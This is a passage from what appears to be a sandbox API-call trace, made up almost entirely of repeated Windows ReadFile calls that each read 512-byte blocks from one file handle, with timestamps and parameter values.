lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, 